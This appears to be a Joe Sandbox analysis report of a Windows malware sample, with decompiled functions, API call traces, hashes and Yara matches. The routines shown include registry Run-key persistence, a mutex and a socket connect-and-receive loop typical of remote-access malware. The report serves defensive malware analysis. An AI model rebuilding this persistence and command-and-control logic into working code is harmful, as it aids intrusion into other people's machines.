                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 7156914f1ba5fd906b6926df68c7eba75dde61265bb5c900d70b96fe17b82f2a
                                      • Instruction ID: 5f068dc4b799136c40c3a03553572b82dc3b579f41ad65ac20123b5f1956b7ba
                                      • Opcode Fuzzy Hash: 7156914f1ba5fd906b6926df68c7eba75dde61265bb5c900d70b96fe17b82f2a
                                      • Instruction Fuzzy Hash: 80A002B55541405FDD445BA19F0EB1539289B46703F444554B3159505195F454008635
                                      Uniqueness

                                      Uniqueness Score: 0.01%

                                      Function 00CC946D, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00CC622D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC7957,00000001,00000364,00000004,000000FF,?,?,?,00CC621F,00CC47EE), ref: 00CC626E
                                      • _free.LIBCMT ref: 00CC94D9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: 17a7c154d6bf4ed951418ce08b6c764d8d70667bd326596135f291e8ce38b01d
                                      • Instruction ID: da143a3c4c3477d2fbd3e0b8426932c04a0f3eac795e039ee2d428b3b423c4e9
                                      • Opcode Fuzzy Hash: 17a7c154d6bf4ed951418ce08b6c764d8d70667bd326596135f291e8ce38b01d
                                      • Instruction Fuzzy Hash: 9501F977200305ABE325CF65D845E5AFBDDFB89370F250A6DE594932C0EA70A906C774
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 00CC622D, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC7957,00000001,00000364,00000004,000000FF,?,?,?,00CC621F,00CC47EE), ref: 00CC626E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 6bfc759032f26152e861165e1dd05bd63c120a5e787c18b8bc91cd0d1e3b6bc6
                                      • Instruction ID: 393561e40e6b5ab3671206b484b0a4d3c8c591d1f6068a9278a49b4fd10de1e9
                                      • Opcode Fuzzy Hash: 6bfc759032f26152e861165e1dd05bd63c120a5e787c18b8bc91cd0d1e3b6bc6
                                      • Instruction Fuzzy Hash: CAF0E23264822067DF316F62CE05F6B775CAF45770B14811DEC24EA290CB30ED0196E0
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 00433001, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00433001(WCHAR** __ecx, WCHAR** __edx, void* __eflags) {
				short _v1028;
				WCHAR** _t14;
				WCHAR** _t15;

				_t15 = __edx;
				_t14 = __ecx;
				E00431052( &_v1028, 0, 0x400);
				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
				E00433412(_t14,  &_v1028); // executed
				return _t14;
			}






                                      0x0043301a
                                      0x0043301c
                                      0x0043301e
                                      0x00433034
                                      0x00433043
                                      0x0043304d

                                      APIs
                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00433034
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$EnvironmentExpandStringslstrcpy
                                      • String ID:
                                      • API String ID: 1709970682-0
                                      • Opcode ID: bd97a94b6263f2ce9abe470818145cdfb2ebbe88521c5753a7468b3aff19ace5
                                      • Instruction ID: 7bb744d929eb1ab5bdabfe564106d2a51295e699e407aa5c4a386e7a79c31d22
                                      • Opcode Fuzzy Hash: bd97a94b6263f2ce9abe470818145cdfb2ebbe88521c5753a7468b3aff19ace5
                                      • Instruction Fuzzy Hash: A6E048B6B0011967DB20A7169C06F96776DEBC4718F050079B719F31D0E9B4DE4A8AA8
                                      Uniqueness

                                      Uniqueness Score: 0.14%

                                      Function 0043D425, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 87%
                                      			E0043D425(signed int* __ecx) {
				char _v8;
				WCHAR* _t3;
				void* _t5;
				signed int* _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t3 = E00435ADB(0x7d0);
				 *__ecx =  *__ecx & 0x00000000;
				_t18 = _t3;
				GetModuleFileNameW(0, _t3, 0x3e8);
				_t5 = E00433412( &_v8, _t18); // executed
				E00433264(_t15, _t5); // executed
				E00435A2D(_v8);
				return _t15;
			}







                                      0x0043d428
                                      0x0043d42b
                                      0x0043d432
                                      0x0043d437
                                      0x0043d43a
                                      0x0043d444
                                      0x0043d44e
                                      0x0043d456
                                      0x0043d45e
                                      0x0043d468

                                      APIs
                                        • Part of subcall function 00435ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0043E415,?,?,00000000,004355C4,?,?,00000000), ref: 00435ADE
                                        • Part of subcall function 00435ADB: HeapAlloc.KERNEL32(00000000,?,00000000,004355C4,?,?,00000000), ref: 00435AE5
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0043F41F,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0043D444
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heaplstrcpylstrlen$AllocFileFreeModuleNameProcessVirtual
                                      • String ID:
                                      • API String ID: 1499825812-0
                                      • Opcode ID: ea98810d96be9925fa2bed455edbfb443980f29e4806d90bf4194c61d34fd33d
                                      • Instruction ID: 5fb82810f78d98bd0308a36868cca944dec911ff13f0e12bc69c32a478657f33
                                      • Opcode Fuzzy Hash: ea98810d96be9925fa2bed455edbfb443980f29e4806d90bf4194c61d34fd33d
                                      • Instruction Fuzzy Hash: 31E0DF6270411067D604B75AEC57BAE76ADCFD5326F00102AF206E21C1DEA81E0096A4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 00433162, Relevance: 1.5, APIs: 1, Instructions: 25stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00433162(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
				void* _t4;
				WCHAR* _t6;
				WCHAR** _t8;
				WCHAR** _t14;

				_t14 = _a4;
				_t8 = __ecx;
				_t4 = E0043308E(_t14);
				_t6 = E004359CE( *((intOrPtr*)(__ecx)), 4 + (_t4 + E0043308E(__ecx)) * 2); // executed
				 *_t8 = _t6;
				return lstrcatW(_t6,  *_t14);
			}







                                      0x00433168
                                      0x0043316b
                                      0x0043316f
                                      0x00433188
                                      0x0043318d
                                      0x0043319c

                                      APIs
                                        • Part of subcall function 0043308E: lstrlenW.KERNEL32(?,00433473,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00433095
                                      • lstrcatW.KERNEL32(00000000,?), ref: 00433192
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1475610065-0
                                      • Opcode ID: ea7cfcebfb4f43efa963f33747c844fc265e5ffab383160c086aec746bd9a370
                                      • Instruction ID: a9181061572a930b6fe2c31e6855c9d2018cb24e38f785aaa2a9a7c0d05e9d27
                                      • Opcode Fuzzy Hash: ea7cfcebfb4f43efa963f33747c844fc265e5ffab383160c086aec746bd9a370
                                      • Instruction Fuzzy Hash: 49E020722002105BCB156F67DC8496D776DEF89360B00003FF505CB215DA755C00C6D5
                                      Uniqueness

                                      Uniqueness Score: 1.37%

                                      Function 0043DD40, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043DD40(intOrPtr* __ecx, CHAR** _a4) {
				intOrPtr* _t10;

				_t10 = __ecx;
				E00432F52(__ecx + 4, _a4); // executed
				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4));
				return 1;
			}




                                      0x0043dd48
                                      0x0043dd4d
                                      0x0043dd61
                                      0x0043dd69

                                      APIs
                                        • Part of subcall function 00432F52: lstrcatA.KERNEL32(00000000,?,?,00000000,?,004333F1,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 00432F7E
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 0043DD5B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEventlstrcat
                                      • String ID:
                                      • API String ID: 2275612694-0
                                      • Opcode ID: 4257faf867405c4d7a2d05bcb66409146c8fefaa8db40ceb512509aa93e75506
                                      • Instruction ID: 1e846c2848de2d676acca6aa92a86d52a2545da47ee5588aa39ce269c33b3ced
                                      • Opcode Fuzzy Hash: 4257faf867405c4d7a2d05bcb66409146c8fefaa8db40ceb512509aa93e75506
                                      • Instruction Fuzzy Hash: CBD02E322082017BD300AB91DD02F82BF29FB61720F008036F20882580CBB1A420CB94
                                      Uniqueness

                                      Uniqueness Score: 1.31%

                                      Function 00440E1E, Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			_entry_(char _a8) {

				_t1 =  &_a8;
				 *_t1 = _a8 - 1;
				if( *_t1 == 0) {
					CreateThread(0, 0, E0043586A, 0, 0, 0); // executed
				}
				return 1;
			}



                                      0x00440e21
                                      0x00440e21
                                      0x00440e25
                                      0x00440e33
                                      0x00440e33
                                      0x00440e3d

                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,0043586A,00000000,00000000,00000000), ref: 00440E33
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 8be525c5326fa9497debc5ba38d01b95b54e652623d0fb2360faed028b5bf9cf
                                      • Instruction ID: 8e24e0651c7bad808e00da9906f516a0fc18d97b3e0ccfdc77b1386fd3def3ca
                                      • Opcode Fuzzy Hash: 8be525c5326fa9497debc5ba38d01b95b54e652623d0fb2360faed028b5bf9cf
                                      • Instruction Fuzzy Hash: 7DC08CB1650208BFB7046BB22C08C7773DCDB25211B40C832BF05C2400D578CC348A38
                                      Uniqueness

                                      Uniqueness Score: 0.06%

                                      Function 0043E236, Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043E236(void** __ecx) {
				void* _t5;
				void** _t10;

				_t10 = __ecx;
				_t5 = CreateMutexA(0, 0, 0); // executed
				 *_t10 = _t5;
				_t10[1] = 0 | _t5 != 0xffffffff;
				return _t10;
			}





                                      0x0043e239
                                      0x0043e23e
                                      0x0043e246
                                      0x0043e250
                                      0x0043e254

                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0043DE7C,?,?,0043E3F7,?,?,00000000,004355C4,?,?,00000000), ref: 0043E23E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateMutex
                                      • String ID:
                                      • API String ID: 1964310414-0
                                      • Opcode ID: d26dd2637229af083a2367407f5c6c63c8eeccf774f00faa61f0083c0a591099
                                      • Instruction ID: ce7fb562abeac0db39c43ca7a2d996d90b94c16f13397e9e5aa0fb7eddb302e0
                                      • Opcode Fuzzy Hash: d26dd2637229af083a2367407f5c6c63c8eeccf774f00faa61f0083c0a591099
                                      • Instruction Fuzzy Hash: 07D012B15005205FE3249F395C08867B5DDDF99720315CF39B4A5C71D4E5708C408760
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0043DBF3, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 50%
                                      			E0043DBF3(void* __ecx) {
				char _v8;
				signed int _t4;

				_push(__ecx);
				_v8 = GetCurrentProcess();
				_t4 = E0043EBD4( &_v8); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}





                                      0x0043dbf6
                                      0x0043dc00
                                      0x0043dc03
                                      0x0043dc0a
                                      0x0043dc0f

                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,00432BBD,?,00442608,?,?,00000000,?,?,?), ref: 0043DBF7
                                        • Part of subcall function 0043EBD4: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0043DC08,?,?,00432BBD,?,00442608,?,?,00000000,?), ref: 0043EBE9
                                        • Part of subcall function 0043EBD4: GetProcAddress.KERNEL32(00000000,?,0043DC08,?,?,00432BBD,?,00442608,?,?,00000000,?), ref: 0043EBF0
                                        • Part of subcall function 0043EBD4: IsWow64Process.KERNEL32(?,00000000,?,0043DC08,?,?,00432BBD,?,00442608,?,?,00000000,?), ref: 0043EC00
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleModuleProcWow64
                                      • String ID:
                                      • API String ID: 1745181078-0
                                      • Opcode ID: 9994b54500e1972c2762c543b231f9dc8189c89cbb4cff8d702faca297beb779
                                      • Instruction ID: 3f8b737b9976352375bbc444fceb0f8697ad7de8232c111277dd34f734a4dc9d
                                      • Opcode Fuzzy Hash: 9994b54500e1972c2762c543b231f9dc8189c89cbb4cff8d702faca297beb779
                                      • Instruction Fuzzy Hash: 0AC08C3085030EABCF10EFB6C90585EB7E89A05208B400668A003D31D0EE74EB08C644
                                      Uniqueness

                                      Uniqueness Score: 0.43%

                                      Function 0043D70F, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0043D715
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID:
                                      • API String ID: 4241100979-0
                                      • Opcode ID: 723127028c0824c374a1bfe5684c98f4400ca9c0bdf9e3867ca83610754a06e3
                                      • Instruction ID: 1b04be9060418ec1721f71337fb3319d6fbfdec9b03131f00dbffc4cb877f694
                                      • Opcode Fuzzy Hash: 723127028c0824c374a1bfe5684c98f4400ca9c0bdf9e3867ca83610754a06e3
                                      • Instruction Fuzzy Hash: 57B012303E424157DA001B708C06F143710A743B07F2006B0B112C80F4C6D100815505
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      Function 00434A83, Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00434A83(void* __ecx, void* __edx, void* __eflags) {
				signed int _v12;
				signed int _v20;
				void* _t18;
				short** _t20;
				void* _t22;
				void* _t24;
				void* _t33;
				void* _t34;
				void* _t35;
				intOrPtr _t37;
				void* _t38;

				_t38 = __eflags;
				_t33 = __edx;
				_t34 = __ecx;
				 *((intOrPtr*)(__ecx + 0x23c)) = 1;
				_t35 = __ecx + 0x1e4;
				do {
					_t26 = _t35;
					_t18 = E004357F5(_t35,  &_v20); // executed
					_t20 = E004357F5(_t35,  &_v12); // executed
					E00433381(_t20, _t37); // executed
					_t22 = E0043538F(_t34 + 4, _t38, _t26,  *((intOrPtr*)(_t18 + 4))); // executed
					E00435A2D(_v12);
					_v12 = _v12 & 0x00000000;
					_t24 = E00435A2D(_v20);
					_v20 = _v20 & 0x00000000;
					_t39 = _t22;
					if(_t22 != 0) {
						_t24 = E004351E4(_t34 + 4, _t33, _t39, _t34);
					}
					Sleep( *(_t34 + 0x210));
					_t35 = _t34 + 0x1e4;
				} while ( *((intOrPtr*)(_t34 + 0x23c)) != 0);
				return _t24;
			}














                                      0x00434a83
                                      0x00434a83
                                      0x00434a8c
                                      0x00434a8e
                                      0x00434a98
                                      0x00434a9e
                                      0x00434aa1
                                      0x00434aa4
                                      0x00434ab4
                                      0x00434abb
                                      0x00434ac3
                                      0x00434acd
                                      0x00434ad5
                                      0x00434ad9
                                      0x00434ade
                                      0x00434ae2
                                      0x00434ae4
                                      0x00434aea
                                      0x00434aea
                                      0x00434af5
                                      0x00434b02
                                      0x00434b02
                                      0x00434b0e

                                      APIs
                                        • Part of subcall function 00433381: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00434AC0,?), ref: 004333AE
                                        • Part of subcall function 00433381: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 004333D9
                                        • Part of subcall function 0043538F: getaddrinfo.WS2_32(?,00000000,00434AC8,00000000), ref: 004353DC
                                        • Part of subcall function 0043538F: socket.WS2_32(00000002,00000001,00000000), ref: 004353F3
                                        • Part of subcall function 0043538F: htons.WS2_32(?), ref: 00435419
                                        • Part of subcall function 0043538F: freeaddrinfo.WS2_32(00000000), ref: 00435429
                                        • Part of subcall function 0043538F: connect.WS2_32(?,?,00000010), ref: 00435435
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00434AF5
                                        • Part of subcall function 004351E4: setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 0043521B
                                        • Part of subcall function 004351E4: recv.WS2_32(000000FF,?,0000000C,00000000), ref: 0043526B
                                        • Part of subcall function 004351E4: recv.WS2_32(000000FF,?,000000FF,00000000), ref: 004352D7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWiderecv$FreeSleepVirtualconnectfreeaddrinfogetaddrinfohtonssetsockoptsocket
                                      • String ID:
                                      • API String ID: 3250391716-0
                                      • Opcode ID: 424d8b38d56f52fa032bcf73cf7a5636db3096304bb2df392324de75b174f696
                                      • Instruction ID: bc0c455e40c77411accbe2cd6a886333f8231335d0d9dce3d03aaeed77e79cf8
                                      • Opcode Fuzzy Hash: 424d8b38d56f52fa032bcf73cf7a5636db3096304bb2df392324de75b174f696
                                      • Instruction Fuzzy Hash: 8A019271A00515ABCB04FB66C84ABEEF779FF44359F01011AE41563141DB786A14CBD8
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 004359AA, Relevance: 1.3, APIs: 1, Instructions: 17memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004359AA(long __ecx) {
				void* _t1;
				long _t7;
				void* _t8;

				_t7 = __ecx;
				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				_t8 = _t1;
				E00435AB9(_t8, _t7);
				return _t8;
			}






                                      0x004359b3
                                      0x004359b8
                                      0x004359be
                                      0x004359c3
                                      0x004359cd

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,0043320F,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 004359B8
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 99f1749da51cb424e49fcef07a8f2b6cfbd679283923d2cf63737f27756b9c84
                                      • Instruction ID: 1076667f22c0c216b28df5d2f29d8df219fa2eb3de0ede04fabfedabafe52af4
                                      • Opcode Fuzzy Hash: 99f1749da51cb424e49fcef07a8f2b6cfbd679283923d2cf63737f27756b9c84
                                      • Instruction Fuzzy Hash: F1C012223492202AE124225A7C1AF5B996CCBC2F71F01002FFB008A2D0D8D01C4241E8
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 00438C74, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00438C74(void* __eax, void* __ecx) {
				int _t3;
				void* _t5;

				_t5 =  *(__ecx + 0x10);
				if(_t5 != 0) {
					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
					return _t3;
				} else {
					return __eax;
				}
			}





                                      0x00438c74
                                      0x00438c79
                                      0x00435a35
                                      0x00435a3b
                                      0x00438c7f
                                      0x00438c7f
                                      0x00438c7f

                                      APIs
